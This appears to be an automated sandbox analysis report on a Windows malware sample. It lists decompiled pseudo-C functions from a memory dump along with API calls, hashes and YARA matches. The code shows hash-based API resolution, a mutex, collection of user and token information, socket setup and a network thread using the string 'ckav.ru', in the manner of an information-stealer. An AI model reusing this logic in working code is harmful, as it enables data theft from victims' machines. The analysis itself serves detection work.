                                      • API String ID: 1507349165-0
                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                      				int _v8;
                                      				long _v12;
                                      				int _v16;
                                      				int _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v32;
                                      				intOrPtr* _t25;
                                      				int _t27;
                                      				int _t30;
                                      				int _t31;
                                      				int _t36;
                                      				int _t37;
                                      				intOrPtr* _t39;
                                      				int _t40;
                                      				long _t44;
                                      				intOrPtr* _t45;
                                      				int _t46;
                                      				void* _t48;
                                      				int _t49;
                                      				void* _t67;
                                      				void* _t68;
                                      				void* _t74;
                                      
                                      				_t48 = __ebx;
                                      				_t67 = 0;
                                      				_v8 = 0;
                                      				E00402BF2();
                                      				_t68 = __eax;
                                      				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                      				_t2 =  &_v8; // 0x414449
                                      				_push(1);
                                      				_push(8);
                                      				_push(_t68);
                                      				if( *_t25() != 0) {
                                      					L4:
                                      					_t27 = E00402B7C(0x208);
                                      					_v20 = _t27;
                                      					__eflags = _t27;
                                      					if(_t27 != 0) {
                                      						E0040338C(_t27, _t67, 0x104);
                                      						_t74 = _t74 + 0xc;
                                      					}
                                      					_push(_t48);
                                      					_t49 = E00402B7C(0x208);
                                      					__eflags = _t49;
                                      					if(_t49 != 0) {
                                      						E0040338C(_t49, _t67, 0x104);
                                      						_t74 = _t74 + 0xc;
                                      					}
                                      					_v28 = 0x208;
                                      					_v24 = 0x208;
                                      					_t7 =  &_v8; // 0x414449
                                      					_v12 = _t67;
                                      					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                      					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                      					__eflags = _t30;
                                      					if(_t30 == 0) {
                                      						_t36 = E00402B7C(_v12);
                                      						_v16 = _t36;
                                      						__eflags = _t36;
                                      						if(_t36 != 0) {
                                      							_t14 =  &_v8; // 0x414449, executed
                                      							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                      							__eflags = _t37;
                                      							if(_t37 != 0) {
                                      								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                      								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                      								__eflags = _t40;
                                      								if(__eflags != 0) {
                                      									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                      								}
                                      							}
                                      							E00402BAB(_v16);
                                      						}
                                      					}
                                      					__eflags = _v8;
                                      					if(_v8 != 0) {
                                      						E00403C40(_v8); // executed
                                      					}
                                      					__eflags = _t49;
                                      					if(_t49 != 0) {
                                      						E00402BAB(_t49);
                                      					}
                                      					_t31 = _v20;
                                      					__eflags = _t31;
                                      					if(_t31 != 0) {
                                      						E00402BAB(_t31);
                                      					}
                                      					return _t67;
                                      				}
                                      				_t44 = GetLastError();
                                      				if(_t44 == 0x3f0) {
                                      					E004060AC();
                                      					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                      					_t3 =  &_v8; // 0x414449
                                      					_t46 =  *_t45(_t44, 8, _t3);
                                      					__eflags = _t46;
                                      					if(_t46 == 0) {
                                      						goto L2;
                                      					}
                                      					goto L4;
                                      				}
                                      				L2:
                                      				return 0;
                                      			}

                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                      • _wmemset.LIBCMT ref: 00406244
                                      • _wmemset.LIBCMT ref: 00406261
                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: _wmemset$ErrorInformationLastToken
                                      • String ID: IDA$IDA
                                      • API String ID: 487585393-2020647798
                                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				void _v40;
                                      				void* _t23;
                                      				signed int _t24;
                                      				signed int* _t25;
                                      				signed int _t30;
                                      				signed int _t31;
                                      				signed int _t33;
                                      				signed int _t41;
                                      				void* _t42;
                                      				signed int* _t43;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t33 = 8;
                                      				memset( &_v40, 0, _t33 << 2);
                                      				_v32 = 1;
                                      				_t23 =  &_v40;
                                      				_v28 = 6;
                                      				_v36 = 2;
                                      				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                      				if(_t23 == 0) {
                                      					_t24 = E00402B7C(4);
                                      					_t43 = _t24;
                                      					_t31 = _t30 | 0xffffffff;
                                      					 *_t43 = _t31;
                                      					_t41 = _v8;
                                      					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                      					 *_t43 = _t24;
                                      					if(_t24 != _t31) {
                                      						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                      						if(_t24 == _t31) {
                                      							E00404DE5(_t24,  *_t43);
                                      							 *_t43 = _t31;
                                      						}
                                      						__imp__freeaddrinfo(_v8);
                                      						if( *_t43 != _t31) {
                                      							_t25 = _t43;
                                      							goto L10;
                                      						} else {
                                      							E00402BAB(_t43);
                                      							L8:
                                      							_t25 = 0;
                                      							L10:
                                      							return _t25;
                                      						}
                                      					}
                                      					E00402BAB(_t43);
                                      					__imp__freeaddrinfo(_v8);
                                      					goto L8;
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: freeaddrinfogetaddrinfosocket
                                      • String ID:
                                      • API String ID: 2479546573-0
                                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                      				struct _SECURITY_ATTRIBUTES* _v8;
                                      				char _v12;
                                      				long _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* _t16;
                                      				intOrPtr* _t25;
                                      				long* _t28;
                                      				void* _t30;
                                      				int _t32;
                                      				intOrPtr* _t33;
                                      				void* _t35;
                                      				void* _t42;
                                      				intOrPtr _t43;
                                      				long _t44;
                                      				struct _OVERLAPPED* _t46;
                                      
                                      				_t46 = 0;
                                      				_t35 = 0;
                                      				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                      				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                      				_t42 = _t16;
                                      				_v8 = _t42;
                                      				if(_t42 == 0xffffffff) {
                                      					__eflags = _a12;
                                      					if(_a12 == 0) {
                                      						L10:
                                      						return _t35;
                                      					}
                                      					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                      					__eflags = _t43;
                                      					if(_t43 == 0) {
                                      						goto L10;
                                      					}
                                      					_push(0);
                                      					__eflags = E00403C59(_a4, _t43);
                                      					if(__eflags != 0) {
                                      						_v8 = 0;
                                      						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                      						_push(_t43);
                                      						 *_a8 = _v8;
                                      						E00403D44();
                                      					}
                                      					E00402BAB(_t43);
                                      					return _t46;
                                      				}
                                      				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                      				_t44 =  *_t25(_t42,  &_v12);
                                      				if(_v12 != 0 || _t44 > 0x40000000) {
                                      					L8:
                                      					_t45 = _v8;
                                      					goto L9;
                                      				} else {
                                      					_t28 = _a8;
                                      					if(_t28 != 0) {
                                      						 *_t28 = _t44;
                                      					}
                                      					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                      					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                      					_t35 = _t30;
                                      					if(_t35 == 0) {
                                      						goto L8;
                                      					} else {
                                      						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                      						_t45 = _v8;
                                      						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                      						if(_t32 == 0) {
                                      							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                      							 *_t33(_t35, _t46, 0x8000);
                                      							_t35 = _t46;
                                      						}
                                      						L9:
                                      						E00403C40(_t45); // executed
                                      						goto L10;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$AllocCreateReadVirtual
                                      • String ID: .tmp
                                      • API String ID: 3585551309-2986845003
                                      • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                      • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00413866(void* __eflags) {
                                      				short _v6;
                                      				short _v8;
                                      				short _v10;
                                      				short _v12;
                                      				short _v14;
                                      				short _v16;
                                      				short _v18;
                                      				short _v20;
                                      				short _v22;
                                      				char _v24;
                                      				short _v28;
                                      				short _v30;
                                      				short _v32;
                                      				short _v34;
                                      				short _v36;
                                      				short _v38;
                                      				short _v40;
                                      				short _v42;
                                      				short _v44;
                                      				short _v46;
                                      				char _v48;
                                      				short _v52;
                                      				short _v54;
                                      				short _v56;
                                      				short _v58;
                                      				short _v60;
                                      				short _v62;
                                      				short _v64;
                                      				short _v66;
                                      				short _v68;
                                      				short _v70;
                                      				short _v72;
                                      				short _v74;
                                      				char _v76;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* _t38;
                                      				short _t43;
                                      				short _t44;
                                      				short _t45;
                                      				short _t46;
                                      				short _t47;
                                      				short _t48;
                                      				short _t50;
                                      				short _t51;
                                      				short _t52;
                                      				short _t54;
                                      				short _t55;
                                      				intOrPtr* _t57;
                                      				intOrPtr* _t59;
                                      				intOrPtr* _t61;
                                      				void* _t63;
                                      				WCHAR* _t65;
                                      				long _t68;
                                      				void* _t75;
                                      				short _t76;
                                      				short _t78;
                                      				short _t83;
                                      				short _t84;
                                      				short _t85;
                                      
                                      				E00402C6C(_t38);
                                      				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                      				SetErrorMode(3); // executed
                                      				_t43 = 0x4f;
                                      				_v76 = _t43;
                                      				_t44 = 0x4c;
                                      				_v74 = _t44;
                                      				_t45 = 0x45;
                                      				_v72 = _t45;
                                      				_t46 = 0x41;
                                      				_v70 = _t46;
                                      				_t47 = 0x55;
                                      				_v68 = _t47;
                                      				_t48 = 0x54;
                                      				_t76 = 0x33;
                                      				_t84 = 0x32;
                                      				_t83 = 0x2e;
                                      				_t78 = 0x64;
                                      				_t85 = 0x6c;
                                      				_v66 = _t48;
                                      				_v52 = 0;
                                      				_t50 = 0x77;
                                      				_v48 = _t50;
                                      				_t51 = 0x73;
                                      				_v46 = _t51;
                                      				_t52 = 0x5f;
                                      				_v42 = _t52;
                                      				_v28 = 0;
                                      				_t54 = 0x6f;
                                      				_v24 = _t54;
                                      				_t55 = 0x65;
                                      				_v20 = _t55;
                                      				_v64 = _t76;
                                      				_v62 = _t84;
                                      				_v60 = _t83;
                                      				_v58 = _t78;
                                      				_v56 = _t85;
                                      				_v54 = _t85;
                                      				_v44 = _t84;
                                      				_v40 = _t76;
                                      				_v38 = _t84;
                                      				_v36 = _t83;
                                      				_v34 = _t78;
                                      				_v32 = _t85;
                                      				_v30 = _t85;
                                      				_v22 = _t85;
                                      				_v18 = _t76;
                                      				_v16 = _t84;
                                      				_v14 = _t83;
                                      				_v12 = _t78;
                                      				_v10 = _t85;
                                      				_v8 = _t85;
                                      				_v6 = 0;
                                      				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                      				 *_t57( &_v76);
                                      				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                      				 *_t59( &_v48);
                                      				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                      				_t81 =  &_v24;
                                      				 *_t61( &_v24); // executed
                                      				_t63 = E00414059(); // executed
                                      				if(_t63 != 0) {
                                      					_t65 = E00413D97(0);
                                      					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                      					CreateMutexW(0, 1, _t65); // executed
                                      					_t68 = GetLastError();
                                      					_t92 = _t68 - 0xb7;
                                      					if(_t68 == 0xb7) {
                                      						E00413B81(0);
                                      						_pop(_t81); // executed
                                      					}
                                      					E00413003(_t92); // executed
                                      					E00412B2E(_t92); // executed
                                      					E00412D31(_t81, _t84); // executed
                                      					E00413B3F();
                                      					E00413B81(0);
                                      					 *0x49fdd0 = 1;
                                      				}
                                      				return 0;
                                      			}
                                      0x00413941
                                      0x00413950
                                      0x00413959
                                      0x0041395f
                                      0x00413968
                                      0x0041396e
                                      0x00413973
                                      0x00413977
                                      0x00413979
                                      0x00413980
                                      0x00413982
                                      0x00413991
                                      0x0041399c
                                      0x0041399e
                                      0x004139a4
                                      0x004139a9
                                      0x004139ac
                                      0x004139b1
                                      0x004139b1
                                      0x004139b2
                                      0x004139b7
                                      0x004139bc
                                      0x004139c1
                                      0x004139c7
                                      0x004139cd
                                      0x004139cd
                                      0x004139db

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                      • GetLastError.KERNEL32 ref: 0041399E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Error$CreateLastModeMutex
                                      • String ID:
                                      • API String ID: 3448925889-0
                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                      				long _v8;
                                      				void* _t7;
                                      				long _t10;
                                      				void* _t21;
                                      				struct _OVERLAPPED* _t24;
                                      
                                      				_t14 = __ebx;
                                      				_t24 = 0;
                                      				_v8 = 0;
                                      				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                      				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                      				_t21 = _t7;
                                      				if(_t21 != 0xffffffff) {
                                      					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                      					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                      					if(_t10 != 0xffffffff) {
                                      						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                      						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                      						_t24 =  !=  ? 1 : 0;
                                      					}
                                      					E00403C40(_t21); // executed
                                      				}
                                      				return _t24;
                                      			}

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 3672724799-0
                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 34%
                                      			E00412D31(void* __ecx, void* __edi) {
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				char _v40;
                                      				void* __ebx;
                                      				intOrPtr* _t10;
                                      				void* _t11;
                                      				void* _t25;
                                      				void* _t26;
                                      				void* _t27;
                                      				void* _t35;
                                      				void* _t53;
                                      				char* _t57;
                                      				void* _t58;
                                      				void* _t61;
                                      				void* _t64;
                                      				void* _t65;
                                      				intOrPtr* _t66;
                                      				void* _t67;
                                      				void* _t68;
                                      				void* _t69;
                                      				void* _t70;
                                      				void* _t71;
                                      				void* _t72;
                                      				void* _t73;
                                      
                                      				_t53 = __ecx;
                                      				_t10 =  *0x49fde0;
                                      				_t68 = _t67 - 0x24;
                                      				 *0x49fddc = 0x927c0;
                                      				 *0x49fde4 = 0;
                                      				_t75 = _t10;
                                      				if(_t10 != 0) {
                                      					L16:
                                      					_push(1);
                                      					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                      					_t61 = _t11;
                                      					_t68 = _t68 + 0xc;
                                      					if(_t61 != 0) {
                                      						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                      						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                      					}
                                      					L004067C4(0xea60); // executed
                                      					_pop(_t53);
                                      				} else {
                                      					_push(__edi);
                                      					 *0x49fde0 = E004056BF(0x2bc);
                                      					E00413DB7(_t53, _t75,  &_v40);
                                      					_t57 =  &_v24;
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					E004058D4( *0x49fde0, 0x12);
                                      					E004058D4( *0x49fde0, 0x28);
                                      					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                      					_t69 = _t68 + 0x28;
                                      					_t64 = E0040632F();
                                      					_push(0);
                                      					_push(1);
                                      					if(_t64 == 0) {
                                      						_push(0);
                                      						_push( *0x49fde0);
                                      						E00405872();
                                      						_t70 = _t69 + 0x10;
                                      					} else {
                                      						_push(_t64);
                                      						_push( *0x49fde0);
                                      						E00405872();
                                      						E00402BAB(_t64);
                                      						_t70 = _t69 + 0x14;
                                      					}
                                      					_t58 = E00406130(_t57);
                                      					_push(0);
                                      					_push(1);
                                      					_t77 = _t64;
                                      					if(_t64 == 0) {
                                      						_push(0);
                                      						_push( *0x49fde0);
                                      						_t25 = E00405872();
                                      						_t71 = _t70 + 0x10; // executed
                                      					} else {
                                      						_push(_t58);
                                      						_push( *0x49fde0);
                                      						E00405872();
                                      						_t25 = E00402BAB(_t58);
                                      						_t71 = _t70 + 0x14;
                                      					}
                                      					_t26 = E004061C3(_t25, 0, _t77); // executed
                                      					_t65 = _t26;
                                      					_push(0);
                                      					_push(1);
                                      					if(_t65 == 0) {
                                      						_push(0);
                                      						_push( *0x49fde0);
                                      						_t27 = E00405872();
                                      						_t72 = _t71 + 0x10;
                                      					} else {
                                      						_push(_t65);
                                      						_push( *0x49fde0);
                                      						E00405872();
                                      						_t27 = E00402BAB(_t65);
                                      						_t72 = _t71 + 0x14;
                                      					}
                                      					_t66 = E00406189(_t27);
                                      					_t79 = _t66;
                                      					if(_t66 == 0) {
                                      						E00405781( *0x49fde0, 0);
                                      						E00405781( *0x49fde0, 0);
                                      						_t73 = _t72 + 0x10;
                                      					} else {
                                      						E00405781( *0x49fde0,  *_t66);
                                      						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                      						E00402BAB(_t66);
                                      						_t73 = _t72 + 0x14;
                                      					}
                                      					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                      					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                      					_t35 = E0040642C(_t79); // executed
                                      					E004058D4( *0x49fde0, _t35);
                                      					E004058D4( *0x49fde0, _v24);
                                      					E004058D4( *0x49fde0, _v20);
                                      					E004058D4( *0x49fde0, _v16);
                                      					E004058D4( *0x49fde0, _v12);
                                      					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                      					_t68 = _t73 + 0x48;
                                      				}
                                      				_t80 =  *0x49fde4;
                                      				if( *0x49fde4 == 0) {
                                      					_t10 =  *0x49fde0;
                                      					goto L16;
                                      				}
                                      				return E00405695(_t53,  *0x49fde0);
                                      			}

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                      • String ID: ckav.ru
                                      • API String ID: 2915393847-2696028687
                                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040632F() {
                                      				char _v8;
                                      				void* _t4;
                                      				void* _t7;
                                      				void* _t16;
                                      
                                      				_t16 = E00402B7C(0x208);
                                      				if(_t16 == 0) {
                                      					L4:
                                      					_t4 = 0;
                                      				} else {
                                      					E0040338C(_t16, 0, 0x104);
                                      					_t1 =  &_v8; // 0x4143e8
                                      					_v8 = 0x208;
                                      					_t7 = E00406069(_t16, _t1); // executed
                                      					if(_t7 == 0) {
                                      						E00402BAB(_t16);
                                      						goto L4;
                                      					} else {
                                      						_t4 = _t16;
                                      					}
                                      				}
                                      				return _t4;
                                      			}

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser_wmemset
                                      • String ID: CA
                                      • API String ID: 2078537776-1052703068
                                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                      				int _t7;
                                      				void* _t8;
                                      
                                      				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                      				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                      				return _t7;
                                      			}

                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken
                                      • String ID: IDA
                                      • API String ID: 4114910276-365204570
                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                      				_Unknown_base(*)()* _t5;
                                      				void* _t6;
                                      
                                      				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                      				_t1 =  &_a8; // 0x403173
                                      				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                      				return _t5;
                                      			}

                                      APIs
                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: s1@
                                      • API String ID: 190572456-427247929
                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
